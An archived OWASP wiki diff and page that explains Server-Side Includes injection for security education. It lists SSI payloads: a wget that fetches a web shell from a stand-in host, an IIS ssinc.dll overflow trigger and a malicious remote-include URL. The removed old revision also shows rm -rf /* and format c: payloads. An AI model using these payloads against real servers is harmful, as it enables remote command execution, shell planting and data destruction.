This site is the archived OWASP Foundation Wiki and is no longer accepting Account Requests.
To view the new OWASP Foundation website, please visit https://owasp.org

Difference between revisions of "Server-Side Includes (SSI) Injection"

From OWASP
Jump to: navigation, search
m (Examples)
(Make sure to wrap examples in nowiki)
 
(21 intermediate revisions by 6 users not shown)
Line 1: Line 1:
 
{{Template:Attack}}
 
{{Template:Attack}}
 +
<br>
 +
[[Category:OWASP ASDR Project]]
 +
 +
 +
Last revision (mm/dd/yy): '''{{REVISIONMONTH}}/{{REVISIONDAY}}/{{REVISIONYEAR}}'''
 +
  
 
==Description==
 
==Description==
SSI can be injected in to input fields where code is echo'd out and attackers are able to execute commands.
+
SSIs are directives present on Web applications used to feed an HTML page with dynamic contents. They are similar to CGIs, except that SSIs are used to execute some actions before the current page is loaded or while the page is being visualized. In order to do so, the web server analyzes SSI before supplying the page to the user.
 +
 
 +
The Server-Side Includes attack allows the exploitation of a web application by injecting scripts in HTML pages or executing arbitrary codes remotely. It can be exploited through manipulation of SSI in use in the application or force its use through user input fields.
 +
 
 +
It is possible to check if the application is properly validating input fields data by inserting characters that are used in SSI directives, like:
 +
 
 +
< ! # = / . " - > and [a-zA-Z0-9]
 +
 
 +
Another way to discover if the application is vulnerable is to verify the presence of pages with extension .stm, .shtm and .shtml. However, the lack of these type of pages does not mean that the application is protected against SSI attacks.
 +
 
 +
In any case, the attack will be successful only if the web server permits SSI execution without proper validation. This can lead to access and manipulation of file system and process under the permission of the web server process owner.
 +
 
 +
The attacker can access sensitive information, such as password files, and execute shell commands. The SSI directives are injected in input fields and they are sent to the web server. The web server parses and executes the directives before supplying the page. Then, the attack result will be viewable the next time that the page is loaded for the user's browser.
 +
 
 +
==Risk Factors ==
 +
TBD
 +
[[Category:FIXME|need content here]]
 +
 
 +
== Examples ==
 +
 
 +
=== Example 1===
 +
 
 +
The commands used to inject SSI vary according to the server operational system in use.  The following commands represent the syntax that should be used to execute OS commands.  
 +
 
 +
'''Linux:'''
 +
 
 +
List files of directory:
 +
 
 +
<nowiki><!--#exec cmd="ls" --></nowiki>
 +
 
 +
Access directories:
 +
 
 +
<nowiki><!--#exec cmd="cd /root/dir/"></nowiki>
 +
 
 +
Execution script:
 +
 +
<nowiki><!--#exec cmd="wget http://mysite.com/shell.txt | rename shell.txt shell.php" --></nowiki>
 +
 
 +
'''Windows:'''
 +
 
 +
List files of directory:
 +
 
 +
<nowiki><!--#exec cmd="dir" --></nowiki>
 +
 
 +
Access directories:
 +
 +
<nowiki><!--#exec cmd="cd C:\admin\dir"></nowiki>
 +
 
 +
===Example 2===
 +
 
 +
Other SSI examples that can be used to access and set server information:
 +
 
 +
To change the error message output:
 +
 +
<nowiki><!--#config errmsg="File not found, informs users and password"--></nowiki>
 +
 
 +
To show current document filename:
 +
 +
<nowiki><!--#echo var="DOCUMENT_NAME" --></nowiki>
 +
 
 +
To show virtual path and filename:
 +
 +
<nowiki><!--#echo var="DOCUMENT_URI" --></nowiki>
 +
 
 +
Using the “config” command and “timefmt” parameter, it is possible to control the date and time output format:
 +
 +
<nowiki><!--#config timefmt="A %B %d %Y %r"--></nowiki>
 +
 
 +
Using the “fsize” command, it is possible to print the size of selected file:
 +
 +
<nowiki><!--#fsize file="ssi.shtml" --></nowiki>
 +
 
 +
===Example 3===
 +
 
 +
An old vulnerability in the IIS versions 4.0 and 5.0 allows an attacker to obtain system privileges through a buffer overflow failure in a dynamic link library (ssinc.dll). The “ssinc.dll” is used to interpreter process Server-Side Includes.
 +
[http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2001-0506 CVE 2001-0506].
 +
 
 +
By creating a malicious page containing the SSI code bellow and forcing the application to load this page ([[Path Traversal]] attack), it’s possible to perform this attack:
 +
 
 +
ssi_over.shtml
 +
 
 +
<nowiki><!--#include file=”UUUUUUUU...UU”--></nowiki>
 +
 
 +
PS: The number of “U” needs to be longer than 2049.
 +
 +
Forcing application to load the ssi_over.shtml page:
 +
 
 +
Non-malicious URL:
 +
 
 +
<nowiki>www.vulnerablesite.org/index.asp?page=news.asp</nowiki>
 +
 
 +
Malicious URL:
 +
<nowiki>www.vulnerablesite.org/index.asp?page=www.malicioussite.com/ssi_over.shtml</nowiki>
 +
 
 +
If the IIS return a blank page it indicates that an overflow has occurred. In this case, the attacker might manipulate the procedure flow and executes arbitrary code.
 +
 
 +
==Related [[Threat Agents]]==
 +
* [[:Category:Command Execution]]
 +
 
 +
==Related [[Attacks]]==
 +
*[[Code Injection]]
 +
 
 +
==Related [[Vulnerabilities]]==
 +
* [[:Category:Input Validation Vulnerability]]
 +
 
 +
==Related [[Controls]]==
 +
* [[:Category:Input Validation Vulnerability]]
 +
 
 +
==References==
 +
* http://www.comptechdoc.org/independent/web/cgi/ssimanual/ssiexamples.html - SSI Examples
 +
 
  
==Examples ==
+
[[Category:FIXME|link not working
'''Linux'''
 
List Files - <!--#exec cmd="ls" -->
 
Remove All - <!--#exec cmd="rm -rf /*" -->
 
Navigate Directories - <!--#exec cmd="cd /root/dir/" -->
 
Plant Shell - <!--#exec cmd="wget http://mysite.com/shell.txt | rename shell.txt shell.php" -->
 
  
'''Windows'''
+
* http://www.students.mines.edu/examples/  - CGI and SSI Examples
List Files - <!--#exec cmd="dir" -->
 
Remove All - <!--#exec cmd="format c:" -->
 
Navigate Directories - <!--#exec cmd="cd C:\admin\dir" -->
 
  
==Related Threats==
 
  
==Related Attacks==
 
  
==Related Vulnerabilities==
+
]]
  
==Related Countermeasures==
 
  
==Categories==
 
  
{{Template:Stub}}
+
[[Category:Injection]]
  
[[Category:Injection Attack]]
+
[[Category:Attack]]

Latest revision as of 01:34, 28 January 2016

This is an Attack. To view all attacks, please see the Attack Category page.



Last revision (mm/dd/yy): 01/28/2016


Description

SSIs are directives present on Web applications used to feed an HTML page with dynamic contents. They are similar to CGIs, except that SSIs are used to execute some actions before the current page is loaded or while the page is being visualized. In order to do so, the web server analyzes SSI before supplying the page to the user.

The Server-Side Includes attack allows the exploitation of a web application by injecting scripts in HTML pages or executing arbitrary codes remotely. It can be exploited through manipulation of SSI in use in the application or force its use through user input fields.

It is possible to check if the application is properly validating input fields data by inserting characters that are used in SSI directives, like:

< ! # = / . " - > and [a-zA-Z0-9] 

Another way to discover if the application is vulnerable is to verify the presence of pages with extension .stm, .shtm and .shtml. However, the lack of these type of pages does not mean that the application is protected against SSI attacks.

In any case, the attack will be successful only if the web server permits SSI execution without proper validation. This can lead to access and manipulation of file system and process under the permission of the web server process owner.

The attacker can access sensitive information, such as password files, and execute shell commands. The SSI directives are injected in input fields and they are sent to the web server. The web server parses and executes the directives before supplying the page. Then, the attack result will be viewable the next time that the page is loaded for the user's browser.

Risk Factors

TBD

Examples

Example 1

The commands used to inject SSI vary according to the server operational system in use. The following commands represent the syntax that should be used to execute OS commands.

Linux:

List files of directory:

<!--#exec cmd="ls" -->

Access directories:

<!--#exec cmd="cd /root/dir/">

Execution script:

<!--#exec cmd="wget http://mysite.com/shell.txt | rename shell.txt shell.php" -->

Windows:

List files of directory:

<!--#exec cmd="dir" -->

Access directories:

<!--#exec cmd="cd C:\admin\dir">

Example 2

Other SSI examples that can be used to access and set server information:

To change the error message output:

<!--#config errmsg="File not found, informs users and password"-->

To show current document filename:

<!--#echo var="DOCUMENT_NAME" -->

To show virtual path and filename:

<!--#echo var="DOCUMENT_URI" -->

Using the “config” command and “timefmt” parameter, it is possible to control the date and time output format:

<!--#config timefmt="A %B %d %Y %r"-->

Using the “fsize” command, it is possible to print the size of selected file:

<!--#fsize file="ssi.shtml" -->

Example 3

An old vulnerability in the IIS versions 4.0 and 5.0 allows an attacker to obtain system privileges through a buffer overflow failure in a dynamic link library (ssinc.dll). The “ssinc.dll” is used to interpreter process Server-Side Includes. CVE 2001-0506.

By creating a malicious page containing the SSI code bellow and forcing the application to load this page (Path Traversal attack), it’s possible to perform this attack:

ssi_over.shtml

<!--#include file=”UUUUUUUU...UU”-->

PS: The number of “U” needs to be longer than 2049.

Forcing application to load the ssi_over.shtml page:

Non-malicious URL:

www.vulnerablesite.org/index.asp?page=news.asp

Malicious URL:

www.vulnerablesite.org/index.asp?page=www.malicioussite.com/ssi_over.shtml

If the IIS return a blank page it indicates that an overflow has occurred. In this case, the attacker might manipulate the procedure flow and executes arbitrary code.

Related Threat Agents

Related Attacks

Related Vulnerabilities

Related Controls

References